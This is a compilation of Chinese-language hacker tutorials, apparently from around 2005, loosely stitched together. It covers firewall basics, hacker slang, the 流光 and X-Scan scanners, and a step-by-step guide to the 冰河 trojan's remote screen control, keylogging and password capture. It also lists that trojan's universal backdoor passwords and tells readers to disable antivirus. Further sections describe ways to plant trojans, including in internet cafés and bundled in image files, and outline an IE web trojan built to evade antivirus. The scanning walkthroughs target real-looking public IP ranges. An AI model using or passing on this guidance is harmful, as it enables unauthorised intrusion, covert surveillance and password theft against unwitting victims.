数据包过滤防火墙的缺点有二:一是非法访问一旦突破防火墙,即可对主机上的软件和配置 漏洞进行攻击;二是数据包的源地址、目的地址以及 IP 的端口号都在数据包的头部,很有 可能被窃听或假冒。 (2)应用级网关 应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针 对特定的网络应用服务协议使用指定的数据过滤逻辑,并在过滤的同时,对数据包进行必要 85 的分析、登记和统计,形成报告。实际中的应用网关通常安装在专用工作站系统上。 数据包过滤和应用网关防火墙有一个共同的特点,就是它们仅仅依*特定的逻辑判定是否允 许数据包通过。一旦满足逻辑,则防火墙内外的计算机系统建立直接联系,防火墙外部的用 户便有可能直接了解防火墙内部的网络结构和运行状态,这有利于实施非法访问和攻击。 (3)代理服务 代理服务(Proxy Service)也称链路级网关或 TCP 通道(Circuit Level Gateways or TCP Tunnels),也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺 点而引入的防火墙技术,其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外 计算机系统间应用层的" 链接",由两个终止代理服务器上的" 链接"来实现,外部计算机的 网络链路只能到达代理服务器,从而起到了隔离防火墙内外计算机系统的作用。此外,代理 服务也对过往的数据包进行分析、注册登记,形成报告,同时当发现被攻击迹象时会向网络 管理员发出警报,并保留攻击痕迹 ========================================================= 黑客之“名词介绍” 1.肉鸡,或者留了后门,可以被我们远程操控的机器,现在许多人把有 WEBSHELL 权限的 机器也叫肉鸡。 2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,战争是特络伊故意留下了个 木马,多方以为是战利品,带回城后,木马里面全是战士,这种东西,就叫做木马,可以说 木马就是一方给肉鸡留下的东西,可以做到远程控制的目的,木马还分不同的作用,有盗号 专用的木马,有远程控制专用的木马,下面介绍点:盗号专用的有许多,盗 QQ 的有 啊拉 QQ 大盗,强强盗 QQ,传奇木马生成器,魔兽木马生成器等;远程控制的木马有:冰河(国 人的骄傲,中国第一款木马),灰鸽子,PCshare,网络神偷,FLUX 等,现在通过线程插入 技术的木马也有很多,大家自己找找吧。 3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播 性,隐秘性,潜伏性。 4、后门:这个就是入侵后为方便我们下次进入肉鸡方便点所留下的东西,亲切的称为后门, 现在好点的后门有 REDMAIN 等。 5、CRACK:这个名词很容易和 HACK 混淆,但是许多人不理解 CRACK 这个东西,但是 接触过软件破解的人一定了解这个词 CRACKER 分析下就是软件破解者的意思(注意这里 有多了个 ER),许多共享软件就是我们的 CRACKER 来完成破解的,就是现在俗称的 XX 软 件破解版。 6、漏洞:这个名词相信也不用太多的介绍,根据字面意思也可以理解,就好象一个房子, 86 门很结实,可是有个窗户却不好,这就很可能造成被别人进入,入侵是也是相对的,必须要 有漏洞才可以入侵,这里顺便介绍下打补丁的意思,还是用上面的例子门很结实,可窗户不 好,这里我们需要把窗户补上,就叫打补丁了,许多人问过我怎样知道自己的机器有漏洞? 怎样打补丁?这里也回答下,首先介绍怎样检查自己奇迹有什么样的漏洞,有款工具简称为 MBSA 是微软公司针对 windows 系统的安全检测工具,大家可以去网上找到自己下下来检 测下自己机器有什么样的漏洞,还介绍下微软的漏洞名称 MS05-001 MS05-002 这种形式的 前面 MS 应为是微软的意思吧,05 呢是 2005 年,001 是在 2005 年第一个漏洞(不知道解释 的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞检测功能,还可以帮你 补上相应的补丁,那么怎么打补丁呢?其实这个很简单,在微软的官方网站里可以输入 MS05-001(如果你有这个漏洞的话)微软就找出了响应的补丁,下载下来 安装下其实就可以 了,呵呵,打补丁也不是什么困难的事情哦。 7、端口:这个是入侵是很重要的一个环节,端口这个东西就好象是我要买东西,需要在 1 号窗口来结帐,而开放的 1 号窗口就好比响应的端口,端口可以形象的比喻成窗口,呵呵, 不同的端口开放了不同的服务,大家可以在网上找到端口对照表来看下不同的端口开放的是 什么服务。 8、权限:这个东西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的 范围,比如法律可以控制人的生命,这种最高权限呢就是计算机中的 Admin 权限 最高权限, 法官呢是执行法律的人,比法律底点,这个呢就是 SYSTEM 权限,系统权限,以下每种人 有着自己不同的权限,比如我们得到了个 WEBSHELL 权限,许多人不知道这个是什么权限, 其实就是个 WEB(网业)的管理权限,权限一般比较低,但是有时想得到个服务器的 ADMIN 权限,就可以先丛 WEBSHELL 权限来入手,也就是长说的提权。 ================================================== 黑客利器流光使用技巧 流光这款软件除了能够像 X-Scan 那样扫描众多 漏洞、弱口令外,还集成了常用的入侵工具, 如字典工具、NT/IIS 工具等,还独创了能够控制“肉鸡”进行扫描的“流光 Sensor 工具” 和为“肉鸡”安装服务的“种植者”工具。 [img]http://cimg.163.com/catchpic/0/01/017362E7E9CD9FEFEA3E63510AD2FAA9.jpg' border=0 onclick="if(this.width>screen.width-461) window.open('http://cimg.163.com/catchpic/2/28/2871E56A479E3E885BD7990B82DB3958.jpg[ j/img] 单击主机列表中的主机便可以直接对目标主机进行连接操作,如图所示。 87 除了使用“高级扫描向导”配置高级扫描外,还可以直接选取高级扫描工具,如图所示。 打开“高级扫描设置”,其界面如图所示。 关于流光的使用就介绍到这里,本节中所介绍的只是流光功能的一小部分,其他一些功能会 在以后的实例中逐一介绍。流光扫描器自身的设置是比较复杂的,有很多选项可以自由设定, 因而也给使用者更大的发挥空间,可以根据网络和机器的状况来尝试改变这些设置,提高扫 描器的性能,而且流光中还有详细的 FAQ 问题解答。 木马工具详解+入门工具使用 现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么,同时还要搞 清楚木马的类型,并且学习一些流行的木马程序的用法,这是一个相辅相成的学习进程,当 黑客利用漏洞进入服务器之后,就可以选择两条路:一、破坏系统、获得资料、显示自己; 二、利用木马为自己开辟一个合法的登录账号、掌管系统、利用被入侵系统作为跳板继续攻 击其他系统。 由此看来,木马程序是为第二种情况涉及的一种可以远程控制系统的程序,根据实现木马程 序的目的,可以知道这种程序应该具有以下性质: 1、伪装性:程序将自己的服务端伪装成合法程序,并且具有诱惑力的让被攻击者执行,在 程序被激活后,木马代码会在未经授权的情况下运行并装载到系统开始运行进程中; 2、隐藏性:木马程序通病毒程序一样,不会暴露在系统进程管理器内,也不会让使用者察 觉到木马的存在,它的所有动作都是伴随其他程序的运行进行的,因此在一般情况下使用者 很难发现系统中木马的存在; 3、破坏性:通过远程控制,黑客可以通过木马程序对系统中的文件进行删除、编辑操作, 还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作; 4、窃密性:木马程序最大的特点就是可以窥视被入侵电脑上的所有资料,这不仅包括硬盘 上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。 看了上面的介绍,学习者应该对木马程序的用途有了一个初步了解,并且区分清除木马程序 和病毒之间的相同点和不同点,由于黑客手段的日益增多,许多新出现的黑客手段(例如 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的黑客手段都是从最开始的溢出、 木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本 的也是最有效的黑客技术进行深入学习。 88 一、木马的原理: 大多数木马程序的基本原理都是一样的,他们是由两个程序配合使用——被安装在入侵系统 内的 Server 程序;另一个是对 Server 其控制作用的 Client 程序。学习者已经了解了木马和 病毒的区别,大多数 Server 程序不会像病毒一样主动传播,而是潜伏在一些合法程序内部, 然后由目标操作者亲手将其安装到系统中,虽然这一切都是没有经过目标操作者授权的,然 而从某种程度上说,这的确是在经过诱惑后目标“心甘情愿”接收木马的,当 Server 安装 成功后,黑客就可以通过 Client 控制程序对 Server 端进行各种操作了。 木马程序的 Server 端为了隐藏自己,必须在设计中做到不让自己显示到任务栏或者系统进 程控制器中,同时还不会影响其他程序的正常运行,当使用者电脑处于断线状态下,Server 段不会发送任何信息到预设的端口上,而会自动检测网络状态直到网络连接好,Server 会通 过 email 或者其他形式将 Server 端系统资料通知 Client 端,同时接收 Client 发送出来的请求。 二.木马实战: 先说国产木马老大,冰河-----你不得不了解的工具。 (编者残语:)说到冰河,也许在 2005 年的今天显得很落后,但冰河创造了一个时代,一个 人人能做黑客的时代。使用方便简单,人人都能上手。图形界面,中文菜单,了解木马,先 从了解远程控制软件冰河开始。 ====================================================== 使用冰河前,请注意:如果你的机器有杀毒软件,可能会出现病毒提示。说实话,他还真是 一个病毒。呵呵。所以在使用前,请慎重考虑,出了问题,小编可担当不起。建议使用不管 是客户端还是服务端都请关闭杀毒软件以达到更好的使用效果。 ====================================================== 软件功能概述: 该软件主要用于远程监控,具体功能包括: 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化 的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框 中出现过的口令信息,且 1.2 以上的版本中允许用户对该功能自行扩充,2.0 以上版本还同 时提供了击键记录功能; 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前 显示分辨率、物理及逻辑磁盘信息等多项系统数据; 89 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册 表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览 文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐 藏方式)等多项文件操作功能; 6.注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操 作功能; 7.发送信息:以四种常用图标向被控端发送简短信息; 8.点对点通讯:以聊天室形式同被控端进行在线交谈。 一.文件列表: 1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以 先通过'G_Client'的'配置本地服务器程序'功能进行一些特殊配置,例如是否将动态 IP 发送到 指定信箱、改变监听端口、设置访问口令等); 2. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。 二.准备工作: 冰河是一个基于 TCP/IP 协议和 WINDOWS 操作系统的网络工具,所以首先应确保该协议已 被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控 的计算机上运行服务器端监控程序即可。 三.升级方法: 由于冰河 2.0 的改版较大,所以 2.0 以后版本与以前各版本完全不兼容。为此只能向老用户 提供一套升级方案:对于 1.1 版本的用户(好象已经没什么人用了),可以先用 1.1 或 1.2 版的 CLIENT 端将新版本的 SERVER 程序上传至被监控端,然后执行'文件打开'命令即可;对于 1.2 版本的用户相对简单,只要通过 1.2 版的 CLIENT 远程打开新版本的 SERVER 程序就可 以自动升级了。2.0 以后的各版本完全兼容。 'DARKSUN 专版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻烦。如果您 不能确定远程主机的冰河版本,在用'文件管理器'浏览目录前,最好先在工具栏下的'当前连 接'列表框中选择打算连接的主机,然后直接点'升级 1.2 版本'按钮进行升级,如果返回的信 息是'无法解释的命令',那说明远程主机安装了 2.0 以上版本,具体的版本及系统信息可以 通过'命令控制台'的'口令类命令\系统信息及口令\系统信息'来查看。 四.各模块简要说明: 90 安装好服务器端监控程序后,运行客户端程序就可以对远程计算机进行监控了,客户端执行 程序的各模块功能如下: 1. "添加主机": 将被监控端 IP 地址添加至主机列表,同时设置好访问口令及端口,设置将保 存在'Operate.ini'文件中,以后不必重输。如果需要修改设置,可以重新添加该主机,或在主 界面工具栏内重新输入访问口令及端口并保存设置; 2. "删除主机": 将被监控端 IP 地址从主机列表中删除(相关设置也将同时被清除); 3. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索 IP 地址'192.168.1.1'至 '192.168.1.255'网段的计算机,应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为 '1'和'255'); 4. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'控制类命令\捕获屏幕\查看屏幕 '); 5. "屏幕控制": 远程模拟鼠标及键盘输入(相当于命令控制台中的'控制类命令\捕获屏幕\屏 幕控制')。其余同"查看屏幕"; 6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界'; 7. "升级 1.2 版本": 通过'DARKSUN 专版'的冰河来升级远程 1.2 版本的服务器程序; 8. "修改远程配置": 在线修改访问口令、监听端口等服务器程序设置,不需要重新上传整个 文件,修改后立即生效; 9. "配置本地服务器程序": 在安装前对'G_Server.exe'进行配置(例如是否将动态 IP 发送到指 定信箱、改变监听端口、设置访问口令等)。 五.文件管理器操作说明: 文件管理器对文件操作提供了下列鼠标操作功能: 1. 文件上传:右键单击欲上传的文件,选择'复制',在目的目录中粘贴即可。也可以在目的 目录中选择'文件上传自',并选定欲上传的文件; 2. 文件下载:右键单击欲下载的文件,选择'复制',在目的目录中粘贴即可。也可以在选定 欲下载的文件后选择'文件下载至',并选定目的目录及文件名; 3. 打开远程或本地文件:选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开',对 于可执行文件若选择了'远程打开',可以进一步设置文件的运行方式和运行参数(运行参数可 为空); 91 4. 删除文件或目录:选定欲删除的文件或目录,在弹出菜单中选择'删除'; 5. 新建目录:在弹出菜单中选择'新建文件夹'并输入目录名即可; 6. 文件查找:选定查找路径,在弹出菜单中选择'文件查找',并输入文件名即可(支持通配符); 7. 拷贝整个目录(只限于被监控端本机):选定源目录并复制,选定目的目录并粘贴即可。 六.命令控制台主要命令: 1. 口令类命令: 系统信息及口令、历史口令、击键记录; 2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控 制(如'锁定注册表'等); 3. 网络类命令: 创建共享、删除共享、查看网络信息; 4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、 打开(对于可执行文件则相当于创建进程); 5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名; 6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。 七.使用技巧: 1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出 菜单中选中'自动跟踪'项即可; 2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件;鼠标双击远程文件将先下载该 文件至临时目录,然后在本地打开; 3. 在使用'网络共享创建'命令时,如果不希望其他人看到新创建的共享名,可以在共享名后 加上'$'符号。自己欲浏览时只要在 IE 的地址栏或'开始菜单'的'运行'对话框内键入'\\[机器 名]\[共享名(含'$'符号)]即可; 4. 在 1.2 以后的版本中允许用户设定捕获图像的色深(1~7 级),图像将按设定保存为 2 的 N 次方种颜色(N=2 的[1~7]次方),即 1 级为单色,2 级为 16 色,3 级为 256 色,依此类推。 需要说明的是如果将色深设为 0 或 8 则表示色深依被监控端当前的分辨率而定,适当减小色 深可以提高图像的传输速度。 2.1 以后的版本新增了以 JPEG 格式传输图像的功能,以利于在 INTERNET 上传输图像,但 这项功能只适用于 2.1 以上版本(制被控端),否则实际上仍是通过 BMP 图象格式传输,所以 92 请先确认版本后再使用。 八.常见问题: 1. 安装不成功,该问题通常是由于 TCP/IP 协议安装或设置不正确所致; 2. 被监控端启动时或与监控端连接时弹出'建立连接'对话框,该问题是由于系统设置了自动 拨号属性。可以通过安装前定制服务器程序来禁止自动拨号; 3. 可以连接但没有反应,通常是版本不匹配所致,因为 1.2 以前的版本设计上存在缺陷,所 以如果您不能确定远程主机的冰河版本,最好先按照前面所说的升级办法试一下,否则被监 控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法监控局域网内的机器, 除非被控端是网关; 4. '更换墙纸'命令无效,这个问题的可能性太多了,较常见的原因是被监控端的桌面设置为' 按 WEB 页查看'; 5. 对被监控端进行文件或目录的增删操作后,少数情况不会自动刷新,可以通过[Ctrl+R]或 选择弹出菜单的'刷新'命令手动刷新; 6. 开机口令不正确,因为 CMOS 口令是单向编码,所以编码后的口令是不可逆也是不唯一 的,冰河通过穷举算出来的口令可能与原口令不符,但也是有效口令。毛主席说过没有调查 就没有发言权,所以没有试过就千万别妄下定论; 7. 占用系统资源过高,其实准确的说应该是 CPU 利用率过高,系统资源占用并不算过分, 这主要是不断探测口令信息(敏感字符)造成的,所以在'DARKSUN 专版'中允许用户将该功 能屏蔽(我实在不知道怎样才能兼顾鱼和熊掌),只要在配置时清空'敏感字符'中的所有字符串 就行了。 8. 如何卸载冰河,这是我解答次数最多的一个问题,其实冰河 1.2 正式版以后的各版本都在 CLIENT 端提供了彻底的卸载功能。对于 1.2 版本,请执行命令列表中的'自动卸载'命令,对 其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸载冰河'。 小编有言:说说卸冰河木马方法和冰河的通用密码 很多朋友问我中了木马“冰河”有什么方法可以卸掉,其实很简单,有两个方法: (1)用杀毒软件“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后 打不开本文文件了,那你可以用手动方法去卸。如果你觉得那个办法太麻烦,可以用我介绍 的第二种方法。 (2)用“冰河”卸“冰河”: 如果你确定你的机器种了冰河,那你上网后开启冰河。 在增 添主机那里添自己的 IP。 然后电击自己的 IP, 选命令控制台那里选控制命令里的系统命 令。 然后自己看啦。不要再说你不会啊。我会晕的啊。:) 93 冰河通用密码 3.0 版:yzkzero.51.net 3.0 版:yzkzero! 3.1-netbug 版密码: 123456!@ 2.2 杀手专版:05181977 2.2 杀手专版:dzq2000! 文:残 了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别 选手) 1.网吧种植 这个似乎在以前很流行,先关闭网吧的放火墙,再安装木马客户端,立刻结帐下机,注意, 重点是不要重起机器,因为现在网吧都有还原精灵,所以在不关机器的情况下,木马是不会 给发现的。因此,在网吧上网,首先要重起机器,其次看看杀毒软件有没有打开。最后建议, 不要在网吧打开有重要密码的东西,如网络银行等。毕竟现在木马客户端躲避防火墙的能力 很强,其次是还存在其他的病毒。 2.通讯软件传送 发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木 马了。(此时,你打开的文件好象“没有任何反应”)“她”可能接着说说:“呀,发错了。再 见。”防御:不要轻易接受别人传的东西,其次是打开前要用杀毒软件查毒。 3.恐怖的捆绑 捆绑软件现在很多,具体使用就是把木马客户端和一个其他文件捆绑在一起(拿 JPG 图象 为例),你看到的文件可能是.jpg,图标也是正常(第 2 条直接传的木马客户端是个 windows 无法识别文件的图标,比较好认),特别是现在有些捆绑软件对捆绑过后的软件进行优化, 杀毒软件很难识别其中是否包含木马程序。建议:不要打开陌生人传递的文件。特别是图象 文件。(诱惑力大哦) 4.高深的编译 对木马客户程序进行编译。让木马更加难以识别。(其实效果同第三条) 94 5.微妙的网页嵌入 将木马安装在自己的主页里面,当你打开页面就自动下载运行。(见下篇,打造网页木马) “你中奖了,请去 www.**.com 领取你的奖品”,黑客可能这么和你说。建议:陌生人提供 的网页不要打开,不要去很奇怪名字的网站。及时升级杀毒软件。 总结:及时升级杀毒软件。不要打开未知文件以及陌生人传来的文件。不要随便打开陌生网 页。升级最新版本的操作系统。还有....请看本专题以后的文章咯。 ============================================================ 你也可以当黑客 打造完美的 IE 网页木马 (残语:比较适合黑客中级选手,日后将推出视频教程) 既然要打造完美的 IE 网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个 完美的IE网页木马至少应具备下列四项特征: 一:可以躲过杀毒软件的追杀; 二:可以避开网络防火墙的报警; 三:能够适用于多数的 Windows 操作系统(主要包括 Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数 IE 版本(主要包括 IE5.0、IE5.5、IE6.0), 最好能打倒 SP 补丁; 四:让浏览者不容易发觉 IE 变化,即可以悄无声息,从而可以长久不被发现。 (注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只 是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我 不会写的哦!) 满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快…… 看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足 吧! 第一种:利用古老的 MIME 漏洞的IE网页木马 这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大, 补丁差不多都补上啦,因此这种木马的种植成功率比较低。 95 第二种:利用 com.ms.activeX.ActiveXComponent 漏洞,结合WSH及FSO控件的IE网 页木马 虽然 com.ms.activeX.ActiveXComponent 漏洞广泛存在于多数IE版本中,是一个比较好的 漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽 说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。 第三种:利用 OBJECT 对象类型确认漏洞(ObjectDataRemote)并结合 WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器) 此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足: 1、因为此漏洞要调用 Mshta.exe 来访问网络下载木马程序,所以会引起防火墙报警(如天 网防火墙); 2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺 顿),而动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……? 3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影 响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件 MIME的形式来利用,但经测试发现对IE6.0不起作用。 看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻! 别急,下面让我带这大家一起打造我心中的完美IE网页木马。 ======================================================= 扫描器的使用 这里我使用 x-scanner 作为介绍对象,原因是 x-scanner 集成了多种扫描功能于一身,它可以 采用多线程方式对指定 IP 地址段(或独立 IP 地址)进行安全漏洞扫描,提供了图形界面和 命令行两种操作方式,扫描内容包括:标准端口状态及端口 banner 信息、CGI 漏洞、RPC 漏洞、SQL-SERVER 默认帐户、FTP 弱口令,NT 主机共享信息、用户信息、组信息、NT 主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm 为扫描结果索引文件。对于 一些已知的 CGI 和 RPC 漏洞,x-scanner 给出了相应的漏洞描述、利用程序及解决方案,节 省了查找漏洞介绍的时间。 首先 x-scanner 包括了两个运行程序:xscann.exe 和 xscan_gui.exe,这两个程序分别是扫描器 的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学 者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我 们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏 洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner 可以支持对多个 96 IP 地址的扫描,也就是说使用者可以利用 xscanner 成批扫描多个 IP 地址,例 如 在 IP 地址范 围内输入 211.100.8.1-211.100.8.255 就会扫描整个 C 类的 255 台服务器(如果存在的话),这 样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果 只输入一个 IP 地址,扫描程序将针对单独 IP 进行扫描。 剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取 80 或者 8080,对 于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是 这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个 socket 连接,在同一 时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置 高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。 在图形界面下我们看到了程序连接地址“.\xscan.exe”,这实际上就是 xscanner 的控制台程序, 也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正 执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是 真正黑客喜爱的操作方式。 现在我们进行一个简单的 cgi 漏洞扫描,这次演练是在控制台模式下进行的:xscan 211.100.8.87 -port 这个命令的意思是让 xscanner 扫描服务器 211.100.8.87 的开放端口,扫描器不会对 65535 个 端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应 的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网 络服务。扫描结果显示如下: Initialize dynamic library succeed. Scanning 211.100.8.87 ...... [211.100.8.87]: Scaning port state ... [211.100.8.87]: Port 21 is listening!!! [211.100.8.87]: Port 25 is listening!!! [211.100.8.87]: Port 53 is listening!!! [211.100.8.87]: Port 79 is listening!!! [211.100.8.87]: Port 80 is listening!!! [211.100.8.87]: Port 110 is listening!!! [211.100.8.87]: Port 3389 is listening!!! 97 [211.100.8.87]: Port scan completed, found 7. [211.100.8.87]: All done. 这个结果还会同时在 log 目录下生成一个 html 文档,阅读文档可以了解发放的端口对应的 服务项目。从结果中看到,这台服务器公开放了七个端口,主要有 21 端口用于文件传输、 80 端口用于网页浏览、还有 110 端口用于 pop3 电子邮件,如此一来,我们就可以进行有关 服务的漏洞扫描了。(关于端口的详细解释会在后续给出) 然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子 版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在 perl 漏洞,之后进 行进一步进攻。 漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找 61.135.50.1 到 61.135.50.255 这 255 台服务器上所有开放了 80 端口的服务器上是否存在漏洞,并且找到存 在什么漏洞,则可以使用 xscan 61.135.50.1-61.135.50.255 -cgi 进行扫描,因为结果比较多, 通过控制台很难阅读,这个时候 xscanner 会在 log 下生成多个 html 的中文说明,进行阅读 这些文档比较方便。 二、扫描器使用问题: 载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原 因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学 习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。 1、为什么我找不到扫描器报告的漏洞? 扫描器报告服务器上存在某个存在漏洞的文件,是发送一个 GET 请求并接收服务器返回值 来判断文件是否存在,这个返回值在 HTTP 的协议中有详细的说明,一般情况下“200”是 文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。 造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在 “千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息 2000 年 x 月 x 日中的 200 是“文件存在”标志,这样就会造成误报; 另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果 GET 申 请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在, 都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者 不能真正判断究竟那个漏洞存在于服务器上。 这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫 描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个 漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文 件是否存在,但这种方法对使用者的能力要求较高。 98 2、我使用的扫描器速度和网络速度有关系嘛? 关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个 GET 请求一般的电话 上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被 扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的 扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造 成本地系统瘫痪,一般使用 30 个线程左右比较合适。 另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一 IP 的单位时间 GET 申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描 速度之前,应该先确认服务器没有相应的过滤功能之后再使用。 3、扫描器报告给我的漏洞无法利用是什么原因? 确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网 络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描 器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网 站的“安全公告”获得相应知识。 对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没 有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络 安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自 己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依*他人,而是自 己寻找漏洞进行攻击的。 4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因? 有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这 就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速 度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下 面的扫描,这样当然是什么也找不到啦。 如果问题真的如此,可以将等待时间设置的长一些,或者换个 ISP 拨号连接。 5、扫描器报告服务器没有提供 HTTP 服务? 网络上大多数 HTTP 服务器和漏洞扫描器的默认端口都是 80,而有少量的 HTTP 服务器并 不是使用 80 端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫 描器察看一下对方究竟使用什么端口进行的 HTTP 服务,网络上常见的端口还有 8080。 另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描 器的功能不仅仅是漏洞扫描,有可能还提供了 rpc 扫描、ftp 默认口令扫描和 NT 弱口令扫描 等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不 99 是出在自己身上。 6、扫描器使用过程中突然停止响应是为什么? 扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造 成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来 而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特 殊的数据报回来造成系统瘫痪…… 因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情 